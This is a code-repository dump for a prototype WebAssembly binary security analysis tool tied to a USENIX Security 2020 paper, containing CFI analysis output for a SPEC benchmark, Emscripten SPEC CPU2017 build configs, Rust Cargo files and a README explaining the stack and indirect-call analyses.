132 |          range: [    9,    9]   length:   1   unique funcs:    1   type: [i32, i64, i32] -> [i64]
133 |          range: [   10,   10]   length:   1   unique funcs:    1   type: [i32, i32, i32] -> [i32]
134 |   9 table init ranges in total
135 | 
136 | Patterns (=preceding instructions) of call_indirect:
137 |      1 × unrestricted                         source:   i32.load   type [i32] -> [i32]
138 |          functions matching by type (regardless whether they are in the table):               28
139 |          functions matching by type and present in table (regardless at which table index):    2
140 |          functions matching by type and present in permissable table index range:              2
141 |      7 × unrestricted                         source:   i32.load   type [i32, i32, i32] -> [i32]
142 |          functions matching by type (regardless whether they are in the table):               14
143 |          functions matching by type and present in table (regardless at which table index):    4
144 |          functions matching by type and present in permissable table index range:              4
145 |      1 × unrestricted                         source:   i32.load   type [i32, i64, i32] -> [i64]
146 |          functions matching by type (regardless whether they are in the table):                2
147 |          functions matching by type and present in table (regardless at which table index):    2
148 |          functions matching by type and present in permissable table index range:              2
149 |      1 × unrestricted                         source: local.(get|tee)   type [i32, f64, i32, i32, i32, i32] -> [i32]
150 |          functions matching by type (regardless whether they are in the table):                1
151 |          functions matching by type and present in table (regardless at which table index):    1
152 |          functions matching by type and present in permissable table index range:              1
153 |      1 × fixed index:      0                  source:  i32.const   type: [i32, i32] -> []
154 |          functions matching by type (regardless whether they are in the table):               16
155 |          functions matching by type and present in table (regardless at which table index):    0
156 |          functions matching by type and present in permissable table index range:              0
157 |      6 × fixed index:      1                  source:  i32.const   type: [i32, i32, i32] -> [f64]
158 |          functions matching by type (regardless whether they are in the table):                2
159 |          functions matching by type and present in table (regardless at which table index):    1
160 |          functions matching by type and present in permissable table index range:              1
161 |   6 call_indirect patterns in total
162 | 
163 | function #1 is indirectly called with a fixed table index
164 |   i32.const 13888
165 |   i32.const 0
166 |   i32.store8
167 |   ...
168 | 
169 | call_indirect target equivalence classes (CFI equivalence classes):
170 |   type: [i32, i32, i32] -> [f64], start idx: Some(1), end idx: Some(1), size (of class): 1, count (how often class appears: 6
171 |   type: [i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 4, count (how often class appears: 7
172 |   type: [i32, i64, i32] -> [i64], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
173 |   type: [i32, i32] -> [], start idx: Some(0), end idx: Some(0), size (of class): 0, count (how often class appears: 1
174 |   type: [i32] -> [i32], start idx: None, end idx: None, size (of class): 2, count (how often class appears: 1
175 |   type: [i32, f64, i32, i32, i32, i32] -> [i32], start idx: None, end idx: None, size (of class): 1, count (how often class appears: 1
176 | 
177 | latex CFI table line for this program: 544.nab & C & 55.6\kern.5ptk\kern1pt & 17 & 1.7\% & 201 & 10 & 5.0\% & 8 & 4.0\% & 6 & 1 & 7 & 2.8 & 1 \\
178 | cfi_latex_csv_sum_avg_line:544.nab,55588,987,17,201,10,8,6,1,7,2.8333333333333335,1
179 | benchmark,binary,class,size,count,source
180 | cfi_csv_line:"544.nab_r","nab_r.wasm",0,1,6,"i32.const"
181 | cfi_csv_line:"544.nab_r","nab_r.wasm",1,4,7,"i32.load"
182 | cfi_csv_line:"544.nab_r","nab_r.wasm",2,2,1,"i32.load"
183 | cfi_csv_line:"544.nab_r","nab_r.wasm",3,0,1,"i32.const"
184 | cfi_csv_line:"544.nab_r","nab_r.wasm",4,2,1,"i32.load"
185 | cfi_csv_line:"544.nab_r","nab_r.wasm",5,1,1,"local.(get|tee)"
186 | total classes: 6
187 | 


--------------------------------------------------------------------------------
/quantitative-evaluation/spec-cpu-compile-configs/emcc-fastcomp.cfg:
--------------------------------------------------------------------------------
 1 | label       = emcc
 2 | # povray and blender are mixed C and C++ benchmarks (and neither has a _s speed version)
 3 | runlist     = pure_c, pure_cpp, 511.povray_r, 526.blender_r
 4 | size        = test
 5 | iterations  = 1
 6 | tune        = base
 7 | default:
 8 |     CC = emcc
 9 |     CXX = em++
10 | 
11 |     CC_VERSION_OPTION = -v
12 |     CXX_VERSION_OPTION = -v
13 |     
14 |     # -fno-strict-aliasing: mentioned under portability in SPEC docs for several programs
15 |     # see e.g. https://www.spec.org/cpu2017/Docs/benchmarks/502.gcc_r.html
16 |     # NOTE OPTIMIZE is also passed to the linker, but EXTRA_PORTABILITY isn't... So have to put the last three args here...
17 |     OPTIMIZE = -O3 -fno-strict-aliasing -s TOTAL_MEMORY=1073741824 -s ALLOW_MEMORY_GROWTH=1 -s NODERAWFS=1
18 |     
19 |     CXXOPTIMIZE = -s DISABLE_EXCEPTION_CATCHING=0
20 |     
21 |     # Portability flags that apply to all programs
22 |     # SPEC_LINUX_IA32: set to 32 bit (copied from Example-clang-llvm-linux-x86.cfg)
23 |     # disable flag passed by default from emcc -Werror=implicit-function-declaration (see emcc --cflags output)
24 |     # TOTAL_MEMORY: increase initial memory size, otherwise compiling, e.g., 531.deepsjeng_r fails with Memory is not large enough for static data (11983920) plus the stack (5242880), please increase TOTAL_MEMORY (16777216) to at least 17227824
25 |     # ALLOW_MEMORY_GROWTH: allow memory allocation in wasm, otherwise memory.grow is not allowed at all and all malloc/new requests will fail (?)
26 |     # use Node.JS FS API in wasm (all until here was from 2019-01-...)
27 |     EXTRA_PORTABILITY = -DSPEC_LINUX_IA32 -Wno-error=implicit-function-declaration -D_FILE_OFFSET_BITS=64
28 | 
29 |     # -z muldefs is not supported by clang, even though SPEC recommends it to "fix" multiply defined symbol linker errors (with gcc it would work)
30 |     # LDOPTIMIZE = -z muldefs
31 |     # LDCFLAGS = -z muldefs
32 | 
33 |     # ERROR_ON_UNDEFINED_SYMBOLS: only warn if there are symbols missing, not error (programs will likely fail at runtime, but for static analysis that is good enough)
34 |     # set output file extension to js to generate Node.JS compatible file
35 |     LDOUT = -s ERROR_ON_UNDEFINED_SYMBOLS=0 -o $@.js
36 | 
37 | 525.x264_r,625.x264_s:
38 |     # ELIDE_CODE: disable getopt.c, fails linking 525.x264_r for some reason
39 |     PORTABILITY = -DELIDE_CODE -DHAVE_STRERROR
40 | 
41 | 500.perlbench_r,600.perlbench_s:
42 |     # I_FCNTL: explicitly #include<fcntl.h> which is required in musl libc (that emcc uses)
43 |     # SPEC_NO_USE_STDIO_PTR and SPEC_NO_USE_STDIO_BASE: see spec_config.h, disable Perl IO which causes compile errors due to meddling with libc internal _IO_FILE structs (which seem to not exist in musl libc?)
44 |     # HAS_DUP2: fix linker error "Linking globals named 'dup2': symbol multiply defined!" due to util.c defining a second dup2 function (no idea who defines the first one, but who cares...)
45 |     PORTABILITY = -std=gnu89 -DI_FCNTL -DSPEC_NO_USE_STDIO_PTR -DSPEC_NO_USE_STDIO_BASE -DHAS_DUP2
46 | 
47 | 502.gcc_r,602.gcc_s:
48 |     # -fgnu89-inline: see https://www.spec.org/cpu2017/Docs/benchmarks/502.gcc_r.html for portability options
49 |     # ELIDE_CODE: similar to x264, do not build getopt code since musl libc provides its own, otherwise linking fails due to multiple symbol definitions
50 |     # HAVE_STRERROR: seems to work as it did for x264
51 |     # HAVE_MKSTEMPS: similar problem here: multiply defined function mkstmps(), see libib_config.h for a solution (?)
52 |     # FIXME HAVE_MKSTEMPS is never used by any #ifdef :/ -> did NOT work :(
53 |     # in the end, I manually linked and just left out mkstemps.o
54 |     PORTABILITY = -fgnu89-inline -DELIDE_CODE -DHAVE_STRERROR -DHAVE_MKSTEMPS
55 | 
56 | 523.xalancbmk_r,623.xalancbmk_s:
57 |     # -DSPEC_LINUX from Example-clang-llvm-linux-x86.cfg does not work, instead I had to dig deeper and fiddle with some internal #ifdefs:
58 |     # Error in ./xercesc/util/AutoSense.hpp:113:6: error: Code requires port to host OS!
59 |     # explicitly set Linux OS (I have no idea what this is used for in the code, but since emscripten basically implements the Linux x86 syscall interface, it should hopefully work...)
60 |     PORTABILITY = -D__linux__
61 | 
62 | 526.blender_r:
63 |     # copied from Example-clang-llvm-linux-x86.cfg
64 |     CPORTABILITY = -funsigned-char
65 |     CXXPORTABILITY = -D__BOOL_DEFINED 


--------------------------------------------------------------------------------
/quantitative-evaluation/spec-cpu-compile-configs/emcc-upstream.cfg:
--------------------------------------------------------------------------------
 1 | label       = emcc
 2 | # povray and blender are mixed C and C++ benchmarks (and neither has a _s speed version)
 3 | runlist     = 500.perlbench_r, 502.gcc_r, 505.mcf_r, 508.namd_r, 510.parest_r, 511.povray_r, 519.lbm_r, 520.omnetpp_r, 523.xalancbmk_r, 525.x264_r, 526.blender_r, 531.deepsjeng_r, 538.imagick_r, 541.leela_r, 544.nab_r, 557.xz_r
 4 | size        = test
 5 | iterations  = 1
 6 | tune        = base
 7 | default:
 8 |     CC = emcc
 9 |     CXX = em++
10 | 
11 |     CC_VERSION_OPTION = -v
12 |     CXX_VERSION_OPTION = -v
13 |     
14 |     # -fno-strict-aliasing: mentioned under portability in SPEC docs for several programs
15 |     # see e.g. https://www.spec.org/cpu2017/Docs/benchmarks/502.gcc_r.html
16 |     # NOTE OPTIMIZE is also passed to the linker, but EXTRA_PORTABILITY isn't... So have to put the last three args here...
17 |     OPTIMIZE = -O3 -fno-strict-aliasing -s TOTAL_MEMORY=1073741824 -s ALLOW_MEMORY_GROWTH=1 -s NODERAWFS=1
18 |     
19 |     CXXOPTIMIZE = -s DISABLE_EXCEPTION_CATCHING=0
20 |     
21 |     # Portability flags that apply to all programs
22 |     # SPEC_LINUX_IA32: set to 32 bit (copied from Example-clang-llvm-linux-x86.cfg)
23 |     # disable flag passed by default from emcc -Werror=implicit-function-declaration (see emcc --cflags output)
24 |     # TOTAL_MEMORY: increase initial memory size, otherwise compiling, e.g., 531.deepsjeng_r fails with Memory is not large enough for static data (11983920) plus the stack (5242880), please increase TOTAL_MEMORY (16777216) to at least 17227824
25 |     # ALLOW_MEMORY_GROWTH: allow memory allocation in wasm, otherwise memory.grow is not allowed at all and all malloc/new requests will fail (?)
26 |     # use Node.JS FS API in wasm (all until here was from 2019-01-...)
27 |     EXTRA_PORTABILITY = -DSPEC_LINUX_IA32 -Wno-error=implicit-function-declaration -D_FILE_OFFSET_BITS=64
28 | 
29 |     # -z muldefs is not supported by clang, even though SPEC recommends it to "fix" multiply defined symbol linker errors (with gcc it would work)
30 |     # LDOPTIMIZE = -z muldefs
31 |     # LDCFLAGS = -z muldefs
32 | 
33 |     # ERROR_ON_UNDEFINED_SYMBOLS: only warn if there are symbols missing, not error (programs will likely fail at runtime, but for static analysis that is good enough)
34 |     # set output file extension to js to generate Node.JS compatible file
35 |     LDOUT = -s ERROR_ON_UNDEFINED_SYMBOLS=0 -o $@.js
36 | 
37 | 525.x264_r,625.x264_s:
38 |     # ELIDE_CODE: disable getopt.c, fails linking 525.x264_r for some reason
39 |     PORTABILITY = -DELIDE_CODE -DHAVE_STRERROR
40 | 
41 | 500.perlbench_r,600.perlbench_s:
42 |     # I_FCNTL: explicitly #include<fcntl.h> which is required in musl libc (that emcc uses)
43 |     # SPEC_NO_USE_STDIO_PTR and SPEC_NO_USE_STDIO_BASE: see spec_config.h, disable Perl IO which causes compile errors due to meddling with libc internal _IO_FILE structs (which seem to not exist in musl libc?)
44 |     # HAS_DUP2: fix linker error "Linking globals named 'dup2': symbol multiply defined!" due to util.c defining a second dup2 function (no idea who defines the first one, but who cares...)
45 |     PORTABILITY = -std=gnu89 -DI_FCNTL -DSPEC_NO_USE_STDIO_PTR -DSPEC_NO_USE_STDIO_BASE -DHAS_DUP2
46 | 
47 | 502.gcc_r,602.gcc_s:
48 |     # -fgnu89-inline: see https://www.spec.org/cpu2017/Docs/benchmarks/502.gcc_r.html for portability options
49 |     # ELIDE_CODE: similar to x264, do not build getopt code since musl libc provides its own, otherwise linking fails due to multiple symbol definitions
50 |     # HAVE_STRERROR: seems to work as it did for x264
51 |     # HAVE_MKSTEMPS: similar problem here: multiply defined function mkstmps(), see libib_config.h for a solution (?)
52 |     # FIXME HAVE_MKSTEMPS is never used by any #ifdef :/ -> did NOT work :(
53 |     # in the end, I manually linked and just left out mkstemps.o
54 |     PORTABILITY = -fgnu89-inline -DELIDE_CODE -DHAVE_STRERROR -DHAVE_MKSTEMPS
55 | 
56 | 523.xalancbmk_r,623.xalancbmk_s:
57 |     # -DSPEC_LINUX from Example-clang-llvm-linux-x86.cfg does not work, instead I had to dig deeper and fiddle with some internal #ifdefs:
58 |     # Error in ./xercesc/util/AutoSense.hpp:113:6: error: Code requires port to host OS!
59 |     # explicitly set Linux OS (I have no idea what this is used for in the code, but since emscripten basically implements the Linux x86 syscall interface, it should hopefully work...)
60 |     PORTABILITY = -D__linux__
61 | 
62 | 526.blender_r:
63 |     # copied from Example-clang-llvm-linux-x86.cfg
64 |     CPORTABILITY = -funsigned-char
65 |     CXXPORTABILITY = -D__BOOL_DEFINED 


--------------------------------------------------------------------------------
/tool/wasm-security-analysis/.gitignore:
--------------------------------------------------------------------------------
1 | /target
2 | **/*.rs.bk
3 | /.idea/
4 | *.iml
5 | 


--------------------------------------------------------------------------------
/tool/wasm-security-analysis/Cargo.lock:
--------------------------------------------------------------------------------
  1 | # This file is automatically @generated by Cargo.
  2 | # It is not intended for manual editing.
  3 | version = 3
  4 | 
  5 | [[package]]
  6 | name = "autocfg"
  7 | version = "1.1.0"
  8 | source = "registry+https://github.com/rust-lang/crates.io-index"
  9 | checksum = "d468802bab17cbc0cc575e9b053f41e72aa36bfa6b7f55e3529ffa43161b97fa"
 10 | 
 11 | [[package]]
 12 | name = "binary_derive"
 13 | version = "0.2.0"
 14 | source = "git+https://github.com/danleh/wasabi#7f8460f720fdf5af40ed22aca23eb64ac0f357cf"
 15 | dependencies = [
 16 |  "quote 0.4.2",
 17 |  "syn 0.12.15",
 18 | ]
 19 | 
 20 | [[package]]
 21 | name = "byteorder"
 22 | version = "1.4.3"
 23 | source = "registry+https://github.com/rust-lang/crates.io-index"
 24 | checksum = "14c189c53d098945499cdfa7ecc63567cf3886b3332b312a5b4585d8d3a6a610"
 25 | 
 26 | [[package]]
 27 | name = "cfg-if"
 28 | version = "1.0.0"
 29 | source = "registry+https://github.com/rust-lang/crates.io-index"
 30 | checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
 31 | 
 32 | [[package]]
 33 | name = "crossbeam-channel"
 34 | version = "0.5.4"
 35 | source = "registry+https://github.com/rust-lang/crates.io-index"
 36 | checksum = "5aaa7bd5fb665c6864b5f963dd9097905c54125909c7aa94c9e18507cdbe6c53"
 37 | dependencies = [
 38 |  "cfg-if",
 39 |  "crossbeam-utils",
 40 | ]
 41 | 
 42 | [[package]]
 43 | name = "crossbeam-deque"
 44 | version = "0.8.1"
 45 | source = "registry+https://github.com/rust-lang/crates.io-index"
 46 | checksum = "6455c0ca19f0d2fbf751b908d5c55c1f5cbc65e03c4225427254b46890bdde1e"
 47 | dependencies = [
 48 |  "cfg-if",
 49 |  "crossbeam-epoch",
 50 |  "crossbeam-utils",
 51 | ]
 52 | 
 53 | [[package]]
 54 | name = "crossbeam-epoch"
 55 | version = "0.9.8"
 56 | source = "registry+https://github.com/rust-lang/crates.io-index"
 57 | checksum = "1145cf131a2c6ba0615079ab6a638f7e1973ac9c2634fcbeaaad6114246efe8c"
 58 | dependencies = [
 59 |  "autocfg",
 60 |  "cfg-if",
 61 |  "crossbeam-utils",
 62 |  "lazy_static",
 63 |  "memoffset",
 64 |  "scopeguard",
 65 | ]
 66 | 
 67 | [[package]]
 68 | name = "crossbeam-utils"
 69 | version = "0.8.8"
 70 | source = "registry+https://github.com/rust-lang/crates.io-index"
 71 | checksum = "0bf124c720b7686e3c2663cf54062ab0f68a88af2fb6a030e87e30bf721fcb38"
 72 | dependencies = [
 73 |  "cfg-if",
 74 |  "lazy_static",
 75 | ]
 76 | 
 77 | [[package]]
 78 | name = "either"
 79 | version = "1.6.1"
 80 | source = "registry+https://github.com/rust-lang/crates.io-index"
 81 | checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
 82 | 
 83 | [[package]]
 84 | name = "hermit-abi"
 85 | version = "0.1.19"
 86 | source = "registry+https://github.com/rust-lang/crates.io-index"
 87 | checksum = "62b467343b94ba476dcb2500d242dadbb39557df889310ac77c5d99100aaac33"
 88 | dependencies = [
 89 |  "libc",
 90 | ]
 91 | 
 92 | [[package]]
 93 | name = "lazy_static"
 94 | version = "1.4.0"
 95 | source = "registry+https://github.com/rust-lang/crates.io-index"
 96 | checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
 97 | 
 98 | [[package]]
 99 | name = "libc"
100 | version = "0.2.126"
101 | source = "registry+https://github.com/rust-lang/crates.io-index"
102 | checksum = "349d5a591cd28b49e1d1037471617a32ddcda5731b99419008085f72d5a53836"
103 | 
104 | [[package]]
105 | name = "memoffset"
106 | version = "0.6.5"
107 | source = "registry+https://github.com/rust-lang/crates.io-index"
108 | checksum = "5aa361d4faea93603064a027415f07bd8e1d5c88c9fbf68bf56a285428fd79ce"
109 | dependencies = [
110 |  "autocfg",
111 | ]
112 | 
113 | [[package]]
114 | name = "num-traits"
115 | version = "0.2.15"
116 | source = "registry+https://github.com/rust-lang/crates.io-index"
117 | checksum = "578ede34cf02f8924ab9447f50c28075b4d3e5b269972345e7e0372b38c6cdcd"
118 | dependencies = [
119 |  "autocfg",
120 | ]
121 | 
122 | [[package]]
123 | name = "num_cpus"
124 | version = "1.13.1"
125 | source = "registry+https://github.com/rust-lang/crates.io-index"
126 | checksum = "19e64526ebdee182341572e50e9ad03965aa510cd94427a4549448f285e957a1"
127 | dependencies = [
128 |  "hermit-abi",
129 |  "libc",
130 | ]
131 | 
132 | [[package]]
133 | name = "ordered-float"
134 | version = "1.1.1"
135 | source = "registry+https://github.com/rust-lang/crates.io-index"
136 | checksum = "3305af35278dd29f46fcdd139e0b1fbfae2153f0e5928b39b035542dd31e37b7"
137 | dependencies = [
138 |  "num-traits",
139 | ]
140 | 
141 | [[package]]
142 | name = "proc-macro2"
143 | version = "0.2.3"
144 | source = "registry+https://github.com/rust-lang/crates.io-index"
145 | checksum = "cd07deb3c6d1d9ff827999c7f9b04cdfd66b1b17ae508e14fe47b620f2282ae0"
146 | dependencies = [
147 |  "unicode-xid",
148 | ]
149 | 
150 | [[package]]
151 | name = "proc-macro2"
152 | version = "1.0.39"
153 | source = "registry+https://github.com/rust-lang/crates.io-index"
154 | checksum = "c54b25569025b7fc9651de43004ae593a75ad88543b17178aa5e1b9c4f15f56f"
155 | dependencies = [
156 |  "unicode-ident",
157 | ]
158 | 
159 | [[package]]
160 | name = "quote"
161 | version = "0.4.2"
162 | source = "registry+https://github.com/rust-lang/crates.io-index"
163 | checksum = "1eca14c727ad12702eb4b6bfb5a232287dcf8385cb8ca83a3eeaf6519c44c408"
164 | dependencies = [
165 |  "proc-macro2 0.2.3",
166 | ]
167 | 
168 | [[package]]
169 | name = "quote"
170 | version = "1.0.18"
171 | source = "registry+https://github.com/rust-lang/crates.io-index"
172 | checksum = "a1feb54ed693b93a84e14094943b84b7c4eae204c512b7ccb95ab0c66d278ad1"
173 | dependencies = [
174 |  "proc-macro2 1.0.39",
175 | ]
176 | 
177 | [[package]]
178 | name = "rayon"
179 | version = "1.5.3"
180 | source = "registry+https://github.com/rust-lang/crates.io-index"
181 | checksum = "bd99e5772ead8baa5215278c9b15bf92087709e9c1b2d1f97cdb5a183c933a7d"
182 | dependencies = [
183 |  "autocfg",
184 |  "crossbeam-deque",
185 |  "either",
186 |  "rayon-core",
187 | ]
188 | 
189 | [[package]]
190 | name = "rayon-core"
191 | version = "1.9.3"
192 | source = "registry+https://github.com/rust-lang/crates.io-index"
193 | checksum = "258bcdb5ac6dad48491bb2992db6b7cf74878b0384908af124823d118c99683f"
194 | dependencies = [
195 |  "crossbeam-channel",
196 |  "crossbeam-deque",
197 |  "crossbeam-utils",
198 |  "num_cpus",
199 | ]
200 | 
201 | [[package]]
202 | name = "scopeguard"
203 | version = "1.1.0"
204 | source = "registry+https://github.com/rust-lang/crates.io-index"
205 | checksum = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd"
206 | 
207 | [[package]]
208 | name = "serde"
209 | version = "1.0.137"
210 | source = "registry+https://github.com/rust-lang/crates.io-index"
211 | checksum = "61ea8d54c77f8315140a05f4c7237403bf38b72704d031543aa1d16abbf517d1"
212 | dependencies = [
213 |  "serde_derive",
214 | ]
215 | 
216 | [[package]]
217 | name = "serde_derive"
218 | version = "1.0.137"
219 | source = "registry+https://github.com/rust-lang/crates.io-index"
220 | checksum = "1f26faba0c3959972377d3b2d306ee9f71faee9714294e41bb777f83f88578be"
221 | dependencies = [
222 |  "proc-macro2 1.0.39",
223 |  "quote 1.0.18",
224 |  "syn 1.0.96",
225 | ]
226 | 
227 | [[package]]
228 | name = "syn"
229 | version = "0.12.15"
230 | source = "registry+https://github.com/rust-lang/crates.io-index"
231 | checksum = "c97c05b8ebc34ddd6b967994d5c6e9852fa92f8b82b3858c39451f97346dcce5"
232 | dependencies = [
233 |  "proc-macro2 0.2.3",
234 |  "quote 0.4.2",
235 |  "unicode-xid",
236 | ]
237 | 
238 | [[package]]
239 | name = "syn"
240 | version = "1.0.96"
241 | source = "registry+https://github.com/rust-lang/crates.io-index"
242 | checksum = "0748dd251e24453cb8717f0354206b91557e4ec8703673a4b30208f2abaf1ebf"
243 | dependencies = [
244 |  "proc-macro2 1.0.39",
245 |  "quote 1.0.18",
246 |  "unicode-ident",
247 | ]
248 | 
249 | [[package]]
250 | name = "unicode-ident"
251 | version = "1.0.0"
252 | source = "registry+https://github.com/rust-lang/crates.io-index"
253 | checksum = "d22af068fba1eb5edcb4aea19d382b2a3deb4c8f9d475c589b6ada9e0fd493ee"
254 | 
255 | [[package]]
256 | name = "unicode-xid"
257 | version = "0.1.0"
258 | source = "registry+https://github.com/rust-lang/crates.io-index"
259 | checksum = "fc72304796d0818e357ead4e000d19c9c174ab23dc11093ac919054d20a6a7fc"
260 | 
261 | [[package]]
262 | name = "wasabi_leb128"
263 | version = "0.4.0"
264 | source = "registry+https://github.com/rust-lang/crates.io-index"
265 | checksum = "1ef95b2fc26dab4b706f4763b297aa7277a1660e83450fa39e6832e64aeeb637"
266 | dependencies = [
267 |  "num-traits",
268 | ]
269 | 
270 | [[package]]
271 | name = "wasm"
272 | version = "0.5.0"
273 | source = "git+https://github.com/danleh/wasabi#7f8460f720fdf5af40ed22aca23eb64ac0f357cf"
274 | dependencies = [
275 |  "binary_derive",
276 |  "byteorder",
277 |  "ordered-float",
278 |  "rayon",
279 |  "serde",
280 |  "wasabi_leb128",
281 | ]
282 | 
283 | [[package]]
284 | name = "wasm-security-analysis"
285 | version = "0.1.0"
286 | dependencies = [
287 |  "wasm",
288 | ]
289 | 


--------------------------------------------------------------------------------
/tool/wasm-security-analysis/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "wasm-security-analysis"
 3 | version = "0.1.0"
 4 | authors = ["Daniel Lehmann <mail@dlehmann.eu>"]
 5 | edition = "2018"
 6 | 
 7 | [dependencies]
 8 | wasm = { git = "https://github.com/danleh/wasabi" }
 9 | 
10 | [profile.release]
11 | lto = true


--------------------------------------------------------------------------------
/tool/wasm-security-analysis/README.md:
--------------------------------------------------------------------------------
 1 | # WebAssembly Binary Security Analysis Tool (Prototype)
 2 | 
 3 | This is a prototype implementation for evaluating the security properties of WebAssembly binaries as described in the USENIX Security 2020 paper "Everything Old is New Again: Binary Security of WebAssembly".
 4 | It has three components:
 5 | 
 6 | - Parsing of a WebAssembly binary, using our own `wasm` library (developed as part of the [Wasabi](https://github.com/danleh/wasabi) instrumentation tool) and printing out overview information about the binary: Number of (imported/local/exported) functions, number of instructions, etc.
 7 | - Analyzing usage of the "unmanaged stack", i.e., the portion in the linear memory space which holds data with function-lifetime that don't fit in Wasm scalar locals, e.g., in C function-scoped arrays.
 8 |     * This is relevant for security, because the more data is on the unmanaged stack, the more can be overwritten by attack primitives on linear memory, which is woefully unprotected (see paper).
 9 |     * Which global variable is the stack pointer? Determined by number of `global.get`/`global.set` instructions and their proportion.
10 |     * Pattern match against function prologue/epilogue code that increments/decrements the stack pointer. Collect all increments and build distribution of stack usage over functions.
11 |     * Both of these are heuristics, based on real-world WebAssembly binaries compiled with different versions of Emscripten/clang. The heuristics should be improved to increase precision (misclassifying globals as stack pointer) and recall (missing stack pointer and stack usages in functions).
12 | - Analyzing indirect calls and indirect-callable functions.
13 |     * This is relevant for security, because indirect calls are (likely) the only control-flow that could be influenced by an attacker, given a memory vulnerability.
14 |     * Analysis of call sites: how many indirect calls are there and where does the indirect call table index come from? (E.g., if it is a constant, it cannot be influenced by an attacker, if it is bitmasked, it may only be in a certain range.)
15 |     * Analysis of the table section and its initialization: how many functions are indirect-callable at all because they appear in the table section?
16 |     * Analysis of CFI restrictions: each indirect call statically encodes a target function type that must match. How does this restrict the number of permissable indirect call control-flow edges?
17 | 
18 | Some of the output is meant for human consumption, other for further scripting (e.g., plotting with Python).
19 | See this less as a library ready for re-use, rather than an example security analysis application.
20 | You will need to adapt this for your usecase.
21 | 
22 | Build with Rust/Cargo nightly 1.43.


--------------------------------------------------------------------------------